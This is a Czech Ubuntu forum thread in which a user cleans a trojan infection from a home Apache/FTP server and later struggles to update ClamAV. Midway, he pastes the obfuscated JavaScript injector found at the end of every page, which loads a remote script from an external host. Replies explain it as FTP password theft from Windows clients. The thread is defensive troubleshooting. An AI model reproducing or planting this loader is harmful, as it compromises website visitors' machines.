Fórum Ubuntu CZ/SK
Ubuntu pro osobní počítače => Obecná podpora => Téma založeno: locus 03 Ledna 2010, 01:32:53
-
Dobrý večer,
Prosím vás nevítě někdo jak přes terminál vymazat span.
Vím že pomocí parametru -r
se vypíšou podsložky
podle parametru -i
se vypíšou jen viry
základní podoba jak projít adresář home je
clamscan -r /home
potřeboval bych aby mi prošel celej PC a ty viry pokud možno smazal vím že tam jsou 3 infekce v celém pc ale nvím jak je odstranit
tímto si scan výpis celého pc
clamscan -r /
ale už nevím jak nastavit aby ty viry i mazal.
Děkuji moc za rady
-
nevíte prosím vás někdo jak na to?
-
Clamscan nepoužívám, ale jistě k něbu bude existovat nějaký manuál. Už ses do něj díval? (příkaz man clamscan :-)
-
ano díval ale nevím jak ty parametri složit tak aby prošel celý PC a aby to popřípadě ty infekce mazal.
tady třeba je manuál
http://linux.die.net/man/8/clamd
tím příkazem naskenuje clej pc
clamscan -r /
Ještě vím že tímto
clamscan --move=/tmp/viry
bych měl přesunout infekci do /tmp/viry
ale nevím jak udělat příkaz který by naskenovla celej pc a pak ty infekce vymazal atd.
Nevíte pls?
-
mohl by stemi prosím někdo poradit nebo nasměrovat.
prosím vás
-
Ahoj Jestli ti to pomůže tak se dá nainstalovat grafické rozhraní clamtk kde si to jednoduše naklikáš myší.
-
http://www.linuxexpres.cz/business/na-vasi-ochranu-antivirovy-program-clamav
Nevím jak, nikdy jsem antiněco v linuxu nepoužil, prostě bych ty hajzlíky v tmp smazal :D
No, výše uvedený odkaz by ti mohl, alespoň trochu pomoci, např. viz. grafické udělátka.
-
no toto jsem našel i já nakonec
ale bohužel toto mí nepomůže potřebuju to v tom terminálu.
Jde toto že jsem připojený na kamaráduv pc přes ssh.
Proto to potřebuju v tom terminálu
Nevíte pls někdo?
Jak by ten příkaz měl vypadat
-
Tak zkus to projít tady:
http://wiki.clamav.net/Main/WebHome
nebo se zeptej na irc:
http://www.clamav.net/support/
EDIT: Příkaz pro smazání "klasické", nikoliv karanténu, je rm, ale nejsem si moc jistej jak bezpečné by to skutečně bylo. ;)
-
A jak vůbec víš, že tam máš nějaký viry?
Předpokládám, že máš tedy na PC i Wokna a ty viry jsou někde tam. V tom případě bys měl mít ten wokenní fs připojenej, abyses k němu vůbec dostal - řekněme, že to taky máš; jak už psal luisah, pokud dokážeš ty infikované soubory dostat někam do tmp, tak je pak prostě smaž a je to. Ale bacha, aby ti pak nechyběly - před smazáním by nebylo od věci opatřit si jejich neinfikované verze, je-li to možné...
Jinak neznám nikoho, kdy by měl zavirovanej linux.
-
Co takhle sudo clamscan -r / --remove
S přidáním parametru -i vypíše jenom infikované
-
no je to dektop s ftp a apchem
no a sice to ted vypíše že bylo nalezeno 0 infekcí ale když se dá třeba otevřít ftp nebo ten web tak to začně psat že je to nebezpečné že je tam spam mailware atd.
Díky moc za vaše nápady.
Co by jste mi prosím kdo doporučili dělat dál?
-
no je to dektop s ftp a apchem
no a sice to ted vypíše že bylo nalezeno 0 infekcí ale když se dá třeba otevřít ftp nebo ten web tak to začně psat že je to nebezpečné že je tam spam mailware atd.
Díky moc za vaše nápady.
Co by jste mi prosím kdo doporučili dělat dál?
Bóóóže!!!
Kdo co začne psát, že je to nebezpečné? A jeké ftp nebo web se otevře? Web na tom počítači nebo někde jinde?
Prepáčte, som z toho volaký zmetený...
-
moc se omlouvám ze nepřesné informace.
Na tom desktopu Ubuntu /běží na něm apache2 a fpt/ pod adresou 10.0.0.11.
Když se na ten web /ubuntu desktop/ mrknu z windowsu třeba IE tak mi antivir na windows pc napíše že jsou tam viry mailware atd
Už mi roumíte aspon trošku co a jak?
-
Jsem "úser" a v počátcích jsem chtěl také využít ClamAV, ale jaksi jsem neuspěl. Tak jsem vygooglil F-Prot a Avast. F-Prot má hroznou instalaci. Avast - stačí stáhnout .deb balíček a dvojklikem spustit instalaci. Grafické prostředí. Nainstaluje se velmi rychle. Potom provést:
- registraci a
- update.
Vše totálně zadara. Lze užít i registrační číslo Avast-u pro Widle.
http://www.avast.com/eng/avast-for-linux-workstation.html (http://www.avast.com/eng/avast-for-linux-workstation.html)
Užívám ho hlavně k perfektnímu odvirování externích pamětí a v případě dual-boot instalací (Win+Linux) i k odvirování partitions s Widlema.
Dodatek: Zatím Avasťáci nemají vyřešen přístup update přes proxy. Tak musí uživatelé stahovat:
http://download1.avast.com/files/latest/400.vps (http://download1.avast.com/files/latest/400.vps)
400.vps a vkládat ručně do:
/home/user/.avast
-
Už ano. Takže asi takto:
Prvně bych tam vytvořil nějakou "práznou stránku" (třeba jenom <h1>Nazdar</h1>) a zkusil to s ní. MSIE je idiot a nemohu vyloučit, že řve už jenom kvůli té ip adrese. Pokud na tuto stránku řvát nebude, tak je potřeba podívat se na zdroje těch stránek, na které to křičí. Pokud jsou to statické html stránky (a ne dynamické stránky, generované např. php), tak tam mohou být nějaké zavlečené nesmysly (obvykle javascript), případně to na něco takového může odkazovat. Ať tak či onak, úpravou (opravou) html kódu se to dá spravit.
Je docela možné, že si tam někdo něco špatného stáhnul z internetu a pošetile vložil do svých stránek.
V každém případě se určitě nejedná o zavirovaný systém (linux).
Pro začátek by to mohlo stačit, dej vědět.
-
Moc děkuji za veškeré rady. Postupoval jsme dle vašich nstrukcí a jelikož jsou to dynamické stránky tak to nejspíše způsobilo tyto chyby tedy byly tam zavlečené nesmysli což popravdě nechápu jak se tam dostali.
Prosím vás jak ted předejít těmto malwerovím útokům?
Ještě bych se chtěl zeptat jestli nevíte jak popřípadě přes co se pokusit to udělat bezpečnější atd.?
Ještě jednou moc děkuji.
PS: Jiank na můj noťas kde mám Ubuntu 9.10 se si dal ten avast je to docela zajímavý antvir.
-
No, ono přijde na to, co to bylo zač. Ale pokud jsou to dynamické stránky, tak to tam musel asi někdo odněkud zkopírovat. Možná v dobré víře, ale i tak. Zavirované péhápko na linuxu jsem tedy ještě neviděl (jako že by to samovolně generovalo "škodlivý kód" :-)
Nějaká ukázka těch "virů" by nebyla?
-
vždycky se na konci všech stránek vloží něco takového
ještě to vypíše antivir že je tam Trojský kuň / malware
<script>/*LGPL*/ try{ window.onload = function(){var Vfdcsw54orzuw7 = document.createElement('s^&#c#r!^i$p$#t#$$'.replace(/\$|&|\)|\(|#|\^|\!|@/ig, ''));Vfdcsw54orzuw7.setAttribute('defer', 'd!#!^@e((#f$$&#e($r)^$'.replace(/\(|&|#|\)|\!|\^|@|\$/ig, ''));Vfdcsw54orzuw7.setAttribute('type', 't$(e))x&@t(^@/&@$j#&a)^v!$&a&@$)s$c!$#r!($i@$p&!@(t$#'.replace(/\^|&|\!|\(|\$|@|\)|#/ig, ''));Vfdcsw54orzuw7.setAttribute('id', 'F^^&j(&^&7&q^b!$(y&6(^#1$@5!8&#(&l@$m@z$#$&j#(!'.replace(/\(|@|&|#|\)|\!|\^|\$/ig, ''));Vfdcsw54orzuw7.setAttribute('s!@&(!r(c#$'.replace(/\!|@|\(|\)|#|\$|\^|&/ig, ''), 'h)@t&t&(^)^p):)#$/(&/!$w$(^!e!r&-$)k()e&n)$n@&t^-@$w@$$e^!^^n!^$^(-!d^!^e)@.^@))g)^!o^)@o^&g^)l(&&@e$#.$!^p!^t!.!#$$m^!$@a)$#t##c!h!$-#@^&c()o@m&(^(.&w!##o(r)@l@!d^!!#w##$e^)b!w@!@o#r&l)$d($.&#@r!!u!:#$^#8@)&0@(8@$0(!#/^@i(^m&!@e@!^)e(@)@^m))&@@.)#c@)@^!o@$m!/$&i#&&m!e@&#e)()m$.))(c(o$)m!/@)!g(o(o^($g@@!l&)!^e$@).)$)c$#o$#m#)/#)^!c)$^a)(&$m#@#4!&.(c^)o^@!m^^/(&g($)$o#$$o!$g(l&&e#(.)#^c(&@o()m#.@#$^u)@)^a)/@)'.replace(/\)|\$|\(|@|\!|#|\^|&/ig, ''));if (document){document.body.appendChild(Vfdcsw54orzuw7);}} } catch(Qbbvxvqzoxdntc5zbwxko) {}</script>
<!--9157f230c9873dffbec7f6778cc93c2e-->
-
To je chyba na straně ftp klienta ve windows. At si odviruji pc ti co k tomuto ftp pristupuji a neukladaji hesla do starsich verzi TC.
-
Tak tak...
-
Tedy odvirovat pc. A tím TC je myšlen Total Comander?
-
Ano (zřejmě).
Funguje to tak, že na nějakém PC s Widlema je virus, který umí najít hesla k ftp (např. uložená prostřednictvím TC), připojit se na ftp, najít tam scripty (html, php, ...) a vylepšit je nějakým svinstvem.
Poté, co zjistíš, ze kterého PC to je a odviruješ ho, musíš ten sajrajt na konci scriptů ještě odstranit.
Příjemnou zábavu :-)
-
Ano (zřejmě).
Funguje to tak, že na nějakém PC s Widlema je virus, který umí najít hesla k ftp (např. uložená prostřednictvím TC), připojit se na ftp, najít tam scripty (html, php, ...) a vylepšit je nějakým svinstvem.
Poté, co zjistíš, ze kterého PC to je a odviruješ ho, musíš ten sajrajt na konci scriptů ještě odstranit.
Příjemnou zábavu :-)
Bych to těm noobovským windosákům hodil na hlavu, ať si s tím hrají. Jeho to neohrožuje, ani to nezaviroval.
PS: Nejsou mezi těmi stránkami i web kadeřnictví? Já jen, že máti si skrz to zavirovala Winy :D
-
Aha. Tedy nějáká ochrana nato asi nebude že? Nějáka kontrola při kopírování přes ftp? Ne ne pár blogu hlavně to ftp s fotkama atd.
-
Aha. Tedy nějáká ochrana nato asi nebude že? Nějáka kontrola při kopírování přes ftp? Ne ne pár blogu hlavně to ftp s fotkama atd.
Ochrana je odvirování pc, který na ftp přistupují a nejlépe změna přihlašovacího hesla. Ty na serveru uděláš prd, když se někdo správně přihlásí a "jen" edituje nějaký soubor..
-
Zdravím. Po čtrnácti dnech opět narážím na problém s antivirem. Chtěl jsem z aktualizovat databázi přes příkaz
freshclam
obdržel jsme toto:
ERROR: Problem with internal logger (UpdateLogFile = /var/log/clamav/freshclam.log).
Nevíte prosím vás co s tím.
-
prosim vás nevíte někdo jak udělat aktualizaci na novější clamav
root@locus:~# freshclam
ClamAV update process started at Sun Jan 17 13:19:16 2010
WARNING: Your ClamAV installation is OUTDATED!
WARNING: Local version: 0.92.1 Recommended version: 0.95.3
DON'T PANIC! Read http://www.clamav.net/support/faq
main.inc is up to date (version: 51, sigs: 545035, f-level: 42, builder: sven)
daily.inc is up to date (version: 10305, sigs: 154300, f-level: 44, builder: guitar)
-
Máš to tam napsaný.
-
jaj koukám na to a něják nerozumím jak tedy
zkusil jsme apt-get update clamav
ato nejde.
Prosim vás nevíte někdo jak?
-
Víš, že máš zastaralou verzi? Víš! Z Tvých repozitářů evidentně novější nedostaneš, tak proč se o to neustále snažíš?! Prostě jdi na stránky ClamAV a tam si stáhni a poté nainstaluj nejnovější verzi. To je to tak těžký pochopit? :-\
-
tak jsme stáhl přes lynx poté rozbalil ale ted nevím jak nainstalovat.
mohl by ste mi prosím někdo poradit?
-
Verze neverze - pořád mi není jasný, k čemu ti to bude - pokud máš zavirovaný widlácký stanice, jak vyplynulo z popisu tvého problému, tak ti je ClamAV totálně k ničemu, řekl bych. Nebo mi něco uniklo?
Instalace - asi tam bude nějaké readme, ne?
-
Potřebuji zaktualizovat ClamAV. Vokna sou už čisté. Redami tam je ale k instalaci tam nic není.
minulej sme použil neco v duchu
./intall.sh
ted to nefunguje
nevíte prosím někdo
-
když dám výpis ls Tak v tom souboru jsou configurační soubory README a INSTALL.
ALe už nevím jak to spustím.
-
Uf! Tak si přečti INSTALL!!!
-
Brzo vznikne klon NTZ ;D
-
::???klon NTZ::??
jejda omlouvám se ale s tímto prostě nemám zkušenosti proto se tak blbě ptám.
INSTALL projíždím. LAe moc mi to není jasné co vlastně tedy mám udělat píše se tam o kompilace moc tomu nerozumím.
Mohl by ste mi prosím s tím poradit.?
-
No, ono tady asi nebude moc lidí, kteří si instalují na linux antivir, tak se nediv...
Předpokládám, že ta instalace nebude zrovna pro začátečníky :-)
Ale ještě pořád ses nám tu nepochlubil, k čemu to vlastně potřebuješ!!!
-
potřebuji to na vyčištěni systému. Mám tam vir. Trojskýho koňa. Před 14 dny jse podařilo částečně vymazat. Ted opět problémi když si dám nějákej soubor na USB a zkusím otevřít v voknach tak okna řvou. Tedy bylo mi doporučeno udělat aktualizaci kamošem. Je tam starý ClamAV tak proto to ted tady tak loboruju.
Popravdě vůbec nevím
-
Hele, netrap se, stejně než to uděláš, bude v tomhle topiců víc stran jak ve vtípkách. Dej si tam třeba Avasta → http://www.avast.com/cze/download-avast-for-linux-edition.html (http://www.avast.com/cze/download-avast-for-linux-edition.html)
-
mě právě láka ten ClamAV protože je zdarma ten avast je jen na rok myslim ne? Nebo vím že je ten avast něják časově omeznej. COž ten ClamAV je free. S ClamAV jsme spokojenej jen nevím jak na tu instalaci / kompilaci.
Nevítě někdo?
-
Avast na Windows má pro nekomerční použití licenci na rok zdarma, tj jen se registrovat. Po roce to jen oživíš. Na Linuxu to bude stejný nebo bez registrace.
-
Tak ať ti s tím poradí ten "kamoš".
Mám pocit, že pořád nechápeš v čem je tvůj problém: jestli máš "zavirovaný" php nebo html soubory, tak musíš předně odvirovat ty Widle, ze kterejch ti tam někdo leze a ty javascriptový přílepky, který ti to tam natahalo, prostě ručně v editoru odstranit, případně obnovit ze zálohy "čistý" soubory, případně si napsat script, kterej ti je odstraní hromadně.
Osobně neznám nikoho, kdo by na Ubuntu provozoval antivir a asi tu takovejch lidí moc nebude.
A krom toho formulace typu když si dám nějákej soubor na USB a zkusím otevřít v voknach tak okna řvou
jsou úplně k ničemu: jaký soubor? Co je uvnitř toho souboru? Co řvou ta Wokna?
-
jj rozumím. jj ručně mazat tomu rozumím. chtěl jsem se zeptat na ten script. Jak to je myšleno? že by to jako kontroloval nebo že by to smazával.
jiank na to USB jsme si zkopíroval soubory z Ubuntu co sem měl pár .doc souboru a pslao to že je tam Trojský kůň JS.
-
jaký doc soubory? Kde se vzali? KDe se vytvorili a cim?
-
A ještě jinak: co že sis to stáhnul z http://www.clamav.net? Protože na stránce http://www.clamav.net/download/packages/packages-linux se píše:
Ubuntu
The Ubuntu packages are maintained by Ubuntu MOTU Developers. ClamAV has been officially included in the Ubuntu distribution since the first Ubuntu release. Run apt-cache search clamav to find the name of the packages available for installation.
There are two classes of clamav packages available for Ubuntu users:
The released set (release, *-updates, and *-security) are patched for security updates. Following extensive testing of clamav and the packages that use it in the backports repository, they may be updated to a newer version. These are official Ubuntu packages and supported by community developers.
The Ubuntu backports repository will contain the newest clamav version that has been at least lightly tested to work with that version. These packages can be installed by enabling the backports repository in your system. These are official Ubuntu packages and supported by community developers.
Protože mi přišlo divný, co ti na tom nemůže fungovat, tak jsem si úplně normálně přes Synaptic (tedy klikačka pro amatéry) nainstaloval clamav a klamav Commit Log for Sun Jan 17 16:15:41 2010
Byly nainstalovány následující balíky:
clamav (0.95.3+dfsg-1ubuntu0.09.10)
clamav-base (0.95.3+dfsg-1ubuntu0.09.10)
clamav-freshclam (0.95.3+dfsg-1ubuntu0.09.10)
klamav (0.46-2ubuntu1)
libclamav6 (0.95.3+dfsg-1ubuntu0.09.10)
libtommath0 (0.39-3)
Poté jsem si (opět myší) spustil Aplikace - Systémové nástroje - KlamAV, zkontroloval, že mám aktuální databázi a nakonec jsem si (opět myší) projel domovskou složku. A dokonce mi to i v nevyžádaný poště našlo nějakýho trojana, což je mi ovšem celkem fuk, protože tady je neškodnej.
Tak teda fakt nevím, co můžeš mí za problém s instalací tohohle antiviru.
-
No tak možná vím proč mi to nešlo updatenout přes
apt-get install update
protože tam jsou zdroje na 8.04.
Tedy je potřeba to zkompilovat. Nevíte někdo jak?
pls rád bych se to naučil?
díky moc
ps: přes terminál
-
prosím vás nevíte někdo jak se kompiluje?
-
Ty používáš Ubuntu 8.04 nebo máš jen špatně nastavené zdroje?
-
prosím vás nevíte někdo jak se kompiluje?
No, vetšinou je to jednoduché, stačí rozbalit archiv (většinou .tar.gz či .tar.bz2) a ve vzniklé složce s programem otevřít terminál (nebo otevřít terminál a pak pomocí příkazu cd dojít do té složky s programem). Pak zadáš ./configure - vypíše to nějaké věci a pokud bude vše ok, půjde ti i spustit příkaz make. Pokud i tento krok proběhne zdárně, tak už jen stačí zadat sudo make install pro dokončení instalace.
Avšak když něco takhle instaluješ a není to v repozitářích, čeká tě nekonečné stahování dalších věcí, které ti řekne configure. Daleko lepší je prostě přejít na vyšší verzi systému a nainstalovat to pohodlně.
To, že ti nejde provést apt-get install update je logické, protože ten příkaz je špatně. Pro obnovení seznamu balíčků slouží apt-get update pro instalaci programů pak apt-get install program.
PS: Jakou verzi Ubuntu vlastně reálně máš a co jsi dělal se zdroji?